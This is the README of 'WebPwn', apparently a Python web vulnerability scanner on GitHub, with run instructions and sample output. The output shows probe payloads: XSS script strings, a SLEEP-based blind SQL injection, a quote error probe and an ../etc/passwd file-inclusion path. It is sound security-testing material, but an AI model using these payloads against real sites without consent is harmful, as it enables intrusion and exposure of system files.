Skip to content

Web Vulnerability Detector (XSS,SQL,LFI,XST,WAF)

License

Notifications You must be signed in to change notification settings

farinap5/webpwn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 

Repository files navigation

WebPwn

Web Vulnerability Scanner


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

SQL injection time based test.

SQL injection error based test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


Download and Run

git clone https://github.com/farinap5/webpwn.git

cd webpwn

python3 webpwn.py http://example.com/page.php?cat=1


Example of Output

python3 webpwn.py http://example.com/page.php?cat=1

[*] No WAF Detected.

    WebPwn
    ------
Target: http://example.com/page.php?cat=1

Server: nginx/1.19.0
Data: Mon, 07 Dec 2020 18:24:50 GMT
Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing XSS
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLi
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing LFI
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing XST
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Discaimer

Usage of the webpwn for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.